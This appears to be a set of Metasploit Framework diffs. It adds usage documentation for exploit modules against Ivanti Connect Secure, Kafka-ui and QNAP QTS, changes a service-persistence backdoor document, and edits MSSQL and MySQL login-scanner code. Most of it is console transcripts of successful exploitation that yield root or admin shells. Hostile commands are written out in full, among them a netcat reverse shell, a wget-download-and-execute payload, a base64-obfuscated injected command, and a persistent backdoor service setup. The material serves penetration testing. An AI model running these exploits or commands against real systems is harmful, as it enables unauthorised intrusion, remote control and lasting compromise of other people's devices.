To support a broad set of available payloads, we support both the Linux and Unix platforms. This allows for native
|
||||
Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
|
||||
|
||||
### Automatic (Linux Payload)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111
|
||||
RHOST => 192.168.86.111
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
|
||||
|
||||
Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[
|
||||
,type:host:port][...]
|
||||
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me
|
||||
tasploit.com/docs/using-metasploit/basi
|
||||
cs/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connecti
|
||||
ons
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Acc
|
||||
epted: CURL, FTP, TFTP, TNFTP
|
||||
, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary
|
||||
after execution
|
||||
FETCH_FILENAME XMZdmHhNxYx no Name to use on remote system
|
||||
when storing payload; cannot
|
||||
contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving p
|
||||
ayload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving
|
||||
payload
|
||||
FETCH_URIPATH no Local URI to use for serving
|
||||
payload
|
||||
FETCH_WRITABLE_DI /tmp yes Remote writable dir to store
|
||||
R payload; cannot contain space
|
||||
s.
|
||||
LHOST eth0 yes The listen address (an interf
|
||||
ace may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
|
||||
[*] 192.168.86.111:443 - The service is running, but could not be validated.
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[*] Sending stage (3045380 bytes) to 192.168.86.111
|
||||
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.111:45734) at 2024-02-09 09:21:59 +0000
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.86.111
|
||||
OS : (Linux 4.15.18.34-production)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > cat /home/ssl-vpn-VERSION
|
||||
export DSREL_MAJOR=22
|
||||
export DSREL_MINOR=3
|
||||
export DSREL_MAINT=1
|
||||
export DSREL_DATAVER=4802
|
||||
export DSREL_PRODUCT=ssl-vpn
|
||||
export DSREL_DEPS=ive
|
||||
export DSREL_BUILDNUM=1647
|
||||
export DSREL_COMMENT="R1"
|
||||
meterpreter > exit
|
||||
[*] Shutting down session: 3
|
||||
|
||||
[*] 192.168.86.111 - Meterpreter session 3 closed. Reason: Died
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) >
|
||||
```
|
||||
|
||||
### Automatic (Unix Payload)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash
|
||||
PAYLOAD => cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
|
||||
|
||||
Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[
|
||||
,type:host:port][...]
|
||||
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me
|
||||
tasploit.com/docs/using-metasploit/basi
|
||||
cs/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connecti
|
||||
ons
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_bash):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST eth0 yes The listen address (an interface may be s
|
||||
pecified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
|
||||
[*] 192.168.86.111:443 - The service is running, but could not be validated.
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.86.42:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.111:45736) at 2024-02-09 09:23:15 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
cat /home/ssl-vpn-VERSION
|
||||
export DSREL_MAJOR=22
|
||||
export DSREL_MINOR=3
|
||||
export DSREL_MAINT=1
|
||||
export DSREL_DATAVER=4802
|
||||
export DSREL_PRODUCT=ssl-vpn
|
||||
export DSREL_DEPS=ive
|
||||
export DSREL_BUILDNUM=1647
|
||||
export DSREL_COMMENT="R1"
|
||||
exit
|
||||
[*] 192.168.86.111 - Command shell session 4 closed.
|
||||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) >
|
||||
```
|
||||
@@ -0,0 +1,224 @@
|
||||
## Vulnerable Application
|
||||
A command injection vulnerability exists in Kafka-ui between `v0.4.0` and `v0.7.1` allowing an attacker to inject
|
||||
and execute arbitrary shell commands via the `groovy` filter parameter at the `topic` section.
|
||||
|
||||
This module has been tested with Kali Linux 2023.11 on the following targets:
|
||||
* Kafka-ui v0.4.0 running on MacOS Docker Desktop
|
||||
* Kafka-ui v0.7.0 running on MacOS Docker Desktop
|
||||
* Kafka-ui v0.7.1 running on MacOS Docker Desktop
|
||||
|
||||
## Installation
|
||||
### Installation steps to install Kafka-ui
|
||||
* Install `Docker` on your preferred platform.
|
||||
* Here are the installation instructions for [Docker Desktop on MacOS](https://docs.docker.com/desktop/install/mac-install/).
|
||||
* Create a empty directory (`kafka-ui`).
|
||||
* Create the following `docker-compose.yaml` file in the directory. This will automatically create a Kafka cluster with Kafka-ui.
|
||||
* You can modify the `v0.7.0` in the `yaml` file to pull different versions.
|
||||
```yaml
|
||||
version: '2'
|
||||
|
||||
networks:
|
||||
rmoff_kafka:
|
||||
name: rmoff_kafka
|
||||
|
||||
services:
|
||||
zookeeper:
|
||||
image: confluentinc/cp-zookeeper:latest
|
||||
container_name: zookeeper
|
||||
networks:
|
||||
- rmoff_kafka
|
||||
environment:
|
||||
ZOOKEEPER_CLIENT_PORT: 2181
|
||||
ZOOKEEPER_TICK_TIME: 2000
|
||||
ports:
|
||||
- 22181:2181
|
||||
|
||||
kafka:
|
||||
image: confluentinc/cp-kafka:latest
|
||||
container_name: kafka
|
||||
networks:
|
||||
- rmoff_kafka
|
||||
depends_on:
|
||||
- zookeeper
|
||||
ports:
|
||||
- 29092:9092
|
||||
environment:
|
||||
KAFKA_BROKER_ID: 1
|
||||
KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
|
||||
KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:9092,PLAINTEXT_HOST://localhost:29092
|
||||
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
|
||||
KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
|
||||
KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
|
||||
|
||||
kafka-ui:
|
||||
container_name: kafka-ui
|
||||
image: provectuslabs/kafka-ui:v0.7.0
|
||||
networks:
|
||||
- rmoff_kafka
|
||||
ports:
|
||||
- 8080:8080
|
||||
depends_on:
|
||||
- kafka
|
||||
- zookeeper
|
||||
environment:
|
||||
KAFKA_CLUSTERS_0_NAME: local
|
||||
KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: kafka:9092
|
||||
KAFKA_CLUSTERS_0_ZOOKEEPER: zookeeper:2181
|
||||
KAFKA_BROKERCONNECT: kafka:9092
|
||||
DYNAMIC_CONFIG_ENABLED: 'true'
|
||||
KAFKA_CLUSTERS_0_METRICS_PORT: 9997
|
||||
```
|
||||
|
||||
* Run following command `docker-compose up -d` to install and run the Kafka ui and cluster environment.
|
||||
* Your Kafka ui should be accessible on `http://localhost:8080` with an active Kafka cluster running.
|
||||
* You can bring down the environment for a fresh start with the command `docker-compose down --volumes`.
|
||||
|
||||
You are now ready to test the module.
|
||||
|
||||
## Verification Steps
|
||||
- [x] Start `msfconsole`
|
||||
- [x] `use exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251`
|
||||
- [x] `set rhosts <ip-target>`
|
||||
- [x] `set lhost <ip-attacker>`
|
||||
- [x] `set target <0=Unix/Linux Command>`
|
||||
- [x] `exploit`
|
||||
|
||||
you should get a `shell` or `Meterpreter`.
|
||||
|
||||
```shell
|
||||
msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > info
|
||||
|
||||
Name: Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.
|
||||
Module: exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251
|
||||
Platform: Unix, Linux
|
||||
Arch: cmd, x64, x86
|
||||
Privileged: Yes
|
||||
License: Metasploit Framework License (BSD)
|
||||
Rank: Excellent
|
||||
Disclosed: 2023-09-27
|
||||
|
||||
Provided by:
|
||||
h00die-gr3y <h00die.gr3y@gmail.com>
|
||||
BobTheShopLifter and Thingstad
|
||||
|
||||
Module side effects:
|
||||
ioc-in-logs
|
||||
artifacts-on-disk
|
||||
|
||||
Module stability:
|
||||
crash-safe
|
||||
|
||||
Module reliability:
|
||||
repeatable-session
|
||||
|
||||
Available targets:
|
||||
Id Name
|
||||
-- ----
|
||||
=> 0 Unix/Linux Command
|
||||
|
||||
Check supported:
|
||||
Yes
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8080 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
|
||||
or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
|
||||
Payload information:
|
||||
|
||||
Description:
|
||||
A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing
|
||||
an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter
|
||||
at the `topic` section.
|
||||
|
||||
References:
|
||||
https://nvd.nist.gov/vuln/detail/CVE-2023-52251
|
||||
https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251
|
||||
https://github.com/BobTheShoplifter/CVE-2023-52251-POC
|
||||
|
||||
|
||||
View the full module info with the info -d command.
|
||||
```
|
||||
|
||||
## Options
|
||||
No specific options for this module.
|
||||
|
||||
## Scenarios
|
||||
### Kafka-ui v0.7.0 Unix/Linux Command - cmd/unix/reverse_netcat
|
||||
```shell
|
||||
msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > set verbose true
|
||||
verbose => true
|
||||
msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > exploit
|
||||
|
||||
[+] mkfifo /tmp/cpzbj; nc 192.168.201.8 4444 0</tmp/cpzbj | /bin/sh >/tmp/cpzbj 2>&1; rm /tmp/cpzbj
|
||||
[*] Started reverse TCP handler on 192.168.201.8:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.201.25:8080 can be exploited.
|
||||
[+] The target is vulnerable. Kafka-ui version: 0.7.0
|
||||
[*] Executing Unix/Linux Command for cmd/unix/reverse_netcat
|
||||
[*] Searching for active Kafka cluster...
|
||||
[+] Active Kafka cluster found: local
|
||||
[*] Creating a new topic...
|
||||
[+] New topic created: 9nQbg
|
||||
[*] Trigger Groovy script payload execution by creating a message...
|
||||
[*] Removing tracks...
|
||||
[+] Successfully deleted topic 9nQbg.
|
||||
[*] Command shell session 28 opened (192.168.201.8:4444 -> 192.168.201.25:49429) at 2024-01-20 18:44:52 +0000
|
||||
|
||||
uname -a
|
||||
Linux 889a0c5cec88 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 Linux
|
||||
id
|
||||
uid=100(kafkaui) gid=101(kafkaui) groups=101(kafkaui)
|
||||
```
|
||||
### Kafka-ui v0.7.0 Unix/Linux Command - cmd/linux/http/x64/meterpreter_reverse_tcp
|
||||
```shell
|
||||
msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > exploit
|
||||
|
||||
[*] Command to run on remote host: wget -qO /tmp/LfMsMsUxX http://192.168.201.8:1981/Qw3rZo-yo18aYrvy_AQU-w; chmod +x /tmp/LfMsMsUxX; /tmp/LfMsMsUxX &
|
||||
[*] Fetch Handler listening on 192.168.201.8:1981
|
||||
[*] HTTP server started
|
||||
[*] Adding resource /Qw3rZo-yo18aYrvy_AQU-w
|
||||
[*] Started reverse TCP handler on 192.168.201.8:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.201.25:8080 can be exploited.
|
||||
[+] The target appears to be vulnerable. Kafka-ui version: 0.7.0
|
||||
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter_reverse_tcp
|
||||
[*] Searching for active Kafka cluster...
|
||||
[+] Active Kafka cluster found: local
|
||||
[*] Creating a new topic...
|
||||
[+] New topic created: D9kH687
|
||||
[*] Trigger Groovy script payload execution by creating a message...
|
||||
[*] Removing tracks...
|
||||
[*] Client 192.168.201.25 requested /Qw3rZo-yo18aYrvy_AQU-w
|
||||
[*] Sending payload to 192.168.201.25 (Wget)
|
||||
[+] Successfully deleted topic D9kH687.
|
||||
[*] Meterpreter session 29 opened (192.168.201.8:4444 -> 192.168.201.25:50355) at 2024-01-23 08:47:41 +0000
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.30.0.4
|
||||
OS : (Linux 6.4.16-linuxkit)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > getuid
|
||||
Server username: kafkaui
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
## Limitations
|
||||
No limitations.
|
||||
@@ -0,0 +1,199 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and
|
||||
QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage
|
||||
(NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.
|
||||
|
||||
The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.
|
||||
The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used
|
||||
during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully
|
||||
initialized, the quick.cgi component is disabled on the system.
|
||||
|
||||
An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command
|
||||
injection, allowing the attacker to execute arbitrary commands on the device.
|
||||
|
||||
### Setup
|
||||
Vulnerable firmware can be downloaded from:
|
||||
[TS-X64_20230926-5.1.2.2533.zip](https://download.qnap.com/Storage/TS-X64/TS-X64_20230926-5.1.2.2533.zip)
|
||||
In order to decrypt the firmware use the following script:
|
||||
[qnap-qts-fw-cryptor.py](https://gist.github.com/ulidtko/966277a465f1856109b2d2674dcee741)
|
||||
|
||||
Unzip the archive:
|
||||
```
|
||||
user@dev:~/qnap/$ unzip TS-X64_20230926-5.1.2.2533.zip
|
||||
Archive: TS-X64_20230926-5.1.2.2533.zip
|
||||
inflating: TS-X64_20230926-5.1.2.2533.img
|
||||
```
|
||||
|
||||
Decrypt the firmware:
|
||||
```
|
||||
user@dev:~/qnap/$ python3 qnap-qts-fw-cryptor.py d QNAPNASVERSION5 TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz
|
||||
Signature check OK, model TS-X64, version 5.1.2
|
||||
Encrypted 1048576 of all 220239236 bytes
|
||||
[99% left]
|
||||
[99% left]
|
||||
[99% left]
|
||||
...snip
|
||||
[02% left]
|
||||
[00% left]
|
||||
[00% left]
|
||||
user@dev:~/qnap/$ ls
|
||||
qnap-qts-fw-cryptor.py TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz TS-X64_20230926-5.1.2.2533.zip
|
||||
```
|
||||
|
||||
Recreate the root file system:
|
||||
```
|
||||
user@dev:~/qnap/$ mkdir firmware
|
||||
user@dev:~/qnap/$ tar -xvzf TS-X64_20230926-5.1.2.2533.tgz -C ./firmware/
|
||||
user@dev:~/qnap/$ binwalk -e firmware/initrd.boot
|
||||
user@dev:~/qnap/$ binwalk -e firmware/_initrd.boot.extracted/0
|
||||
user@dev:~/qnap/$ binwalk -e firmware/rootfs2.bz
|
||||
user@dev:~/qnap/$ binwalk -e firmware/_rootfs2.bz.extracted/0
|
||||
user@dev:~/qnap/$ mv firmware/_rootfs2.bz.extracted/_0.extracted/* firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
|
||||
```
|
||||
|
||||
To run the Firmware first copy the qemu-x86_64-static binary into the root file system folder:
|
||||
```
|
||||
user@dev:~/qnap/$ cd firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ cp $(which qemu-x86_64-static) .
|
||||
```
|
||||
|
||||
Run _thttpd_ via QEMU:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$
|
||||
sudo chroot . ./qemu-x86_64-static usr/local/sbin/_thttpd_ -p 8080 -nor -nos -u admin -d /home/httpd -c '**.*' -h 0.0.0.0 -i /var/lock/._thttpd_.pid
|
||||
```
|
||||
|
||||
Verify the HTTP server is running:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo netstat -lnp | grep 8080
|
||||
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 1195417/./qemu-x86_
|
||||
```
|
||||
|
||||
At the time of writing `/dev/random` and `/dev/urandom` are required to be present in the environment in order to work
|
||||
around the following issue: https://github.com/rapid7/mettle/issues/255.
|
||||
Ensure the binaries exist on your system:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/random
|
||||
/dev/random
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/urandom
|
||||
/dev/urandom
|
||||
```
|
||||
|
||||
Create files the files:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/random
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/urandom
|
||||
```
|
||||
|
||||
Mount the binaries:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind /dev/random dev/random
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind /dev/urandom dev/urandom
|
||||
```
|
||||
|
||||
Drop to a shell via QEMU:
|
||||
```
|
||||
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo chroot . /bin/sh
|
||||
```
|
||||
|
||||
Enable the component quick.cgi:
|
||||
```
|
||||
sh-3.2# chmod +x /home/httpd/cgi-bin/quick/quick.cgi
|
||||
```
|
||||
|
||||
Fix a linker issue with QEMU:
|
||||
```
|
||||
sh-3.2# rm /lib/libnl-3.so.200
|
||||
sh-3.2# ln -s /lib/libnl-3.so.200.24.0 /lib/libnl-3.so.200
|
||||
```
|
||||
|
||||
Create this folder as it will be present in a NAS device containing a hard drive:
|
||||
```
|
||||
sh-3.2# mkdir /mnt/HDA_ROOT
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
1. Do: `use linux/http/qnap_qts_rce_cve_2023_47218`
|
||||
1. Set the following options: `RHOST`, `RPORT`, `LHOST` and `FETCH_SRVPORT` if 8080 is already in use.
|
||||
1. Run the module
|
||||
1. Receive a Meterpreter session as the `admin` user.
|
||||
|
||||
## Scenarios
|
||||
### TS-X64_20230926-5.1.2.2533 firmware emulated via qemu using the steps above.
|
||||
```
|
||||
msf6 > use linux/http/qnap_qts_rce_cve_2023_47218
|
||||
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set rport 8080
|
||||
rport => 8080
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set rhost 172.16.199.130
|
||||
rhost => 172.16.199.130
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set lhost 172.16.199.158
|
||||
lhost => 172.16.199.158
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set fetch_srvport 8085
|
||||
fetch_srvport => 8085
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > options
|
||||
|
||||
Module options (exploit/linux/http/qnap_qts_rce_cve_2023_47218):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 172.16.199.130 yes The target host(s), see https://docs.metasploit.com/docs/using-metasp
|
||||
loit/basics/using-metasploit.html
|
||||
RPORT 8080 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
|
||||
, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILENAME mvcWDkBxSOK no Name to use on remote system when storing payload; cannot
|
||||
contain spaces.
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8085 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
FETCH_WRITABLE_DIR /mnt/update yes Remote writable dir to store payload; cannot contain space
|
||||
s.
|
||||
LHOST 172.16.199.158 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Default
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.199.158:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[*] Sending stage (3045380 bytes) to 172.16.199.130
|
||||
[+] Deleted /mnt/update/RjzvVkLp
|
||||
[+] Deleted /mnt/update/"$($(echo -n YmFzaCAvbW50L3VwZGF0ZS9Sanp2VmtMcA==|base64 -d))"
|
||||
[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.16.199.130:40004) at 2024-02-15 12:20:04 -0900
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: admin
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.16.199.130
|
||||
OS : (Linux 6.2.0-35-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
@@ -39,7 +39,7 @@
|
||||
2. Upstart: Logs to its own file. This module is set to restart the shell after a 10sec pause, and do this forever.
|
||||
3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.
|
||||
|
||||
**SHELLPATH**
|
||||
**BACKDOOR_PATH**
|
||||
|
||||
If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin
|
||||
|
||||
@@ -72,15 +72,15 @@ Get initial access
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
Install our callback service (system_v w/ chkconfig). Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
|
||||
Install our callback service (system_v w/ chkconfig). Note we change BACKDOOR_PATH since /usr/local/bin isnt in the path for CentOS 5 services.
|
||||
|
||||
msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
|
||||
msf exploit(service_persistence) > set session 1
|
||||
session => 1
|
||||
msf exploit(service_persistence) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(service_persistence) > set SHELLPATH /bin
|
||||
SHELLPATH => /bin
|
||||
msf exploit(service_persistence) > set BACKDOOR_PATH /bin
|
||||
BACKDOOR_PATH => /bin
|
||||
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
|
||||
payload => cmd/unix/reverse_netcat
|
||||
msf exploit(service_persistence) > set lhost 192.168.199.128
|
||||
@@ -260,12 +260,12 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
|
||||
|
||||
Module options (exploit/linux/local/service_persistence):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SERVICE no Name of service to create
|
||||
SESSION -1 yes The session to run this module on.
|
||||
SHELLPATH /tmp yes Writable path to put our shell
|
||||
SHELL_NAME no Name of shell file to write
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
BACKDOOR_PATH /tmp yes Writable path to put our shell
|
||||
SERVICE no Name of service to create
|
||||
SESSION yes The session to run this module on
|
||||
SHELL_NAME no Name of shell file to write
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_netcat):
|
||||
|
||||
@@ -47,7 +47,16 @@ module Metasploit
|
||||
# @return [Boolean] Whether to use Windows Authentication instead of SQL Server Auth.
|
||||
attr_accessor :windows_authentication
|
||||
|
||||
# @!attribute use_client_as_proof
|
||||
# @return [Boolean] If a login is successful and this attribute is true - an MSSQL::Client instance is used as proof
|
||||
attr_accessor :use_client_as_proof
|
||||
|
||||
# @!attribute max_send_size
|
||||
# @return [Integer] The max size of the data to encapsulate in a single packet
|
||||
attr_accessor :max_send_size
|
||||
|
||||
# @!attribute send_delay
|
||||
# @return [Integer] The delay between sending packets
|
||||
attr_accessor :send_delay
|
||||
|
||||
validates :windows_authentication,
|
||||
@@ -68,9 +77,14 @@ module Metasploit
|
||||
}
|
||||
|
||||
begin
|
||||
client = Rex::Proto::MSSQL::Client.new(framework_module, framework, host, port)
|
||||
client = Rex::Proto::MSSQL::Client.new(framework_module, framework, host, port, proxies)
|
||||
if client.mssql_login(credential.public, credential.private, '', credential.realm)
|
||||
result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
|
||||
if use_client_as_proof
|
||||
result_options[:proof] = client
|
||||
else
|
||||
client.disconnect
|
||||
end
|
||||
else
|
||||
result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
|
||||
end
|
||||
@@ -81,8 +95,6 @@ module Metasploit
|
||||
elog(e)
|
||||
result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
|
||||
result_options[:proof] = e
|
||||
ensure
|
||||
client.disconnect
|
||||
end
|
||||
|
||||
::Metasploit::Framework::LoginScanner::Result.new(result_options)
|
||||
|
||||
@@ -37,9 +37,9 @@ module Metasploit
|
||||
begin
|
||||
# manage our behind the scenes socket. Close any existing one and open a new one
|
||||
disconnect if self.sock
|
||||
connect
|
||||
self.sock = connect
|
||||
|
||||
mysql_conn = ::Mysql.connect(host, credential.public, credential.private, '', port, sock)
|
||||
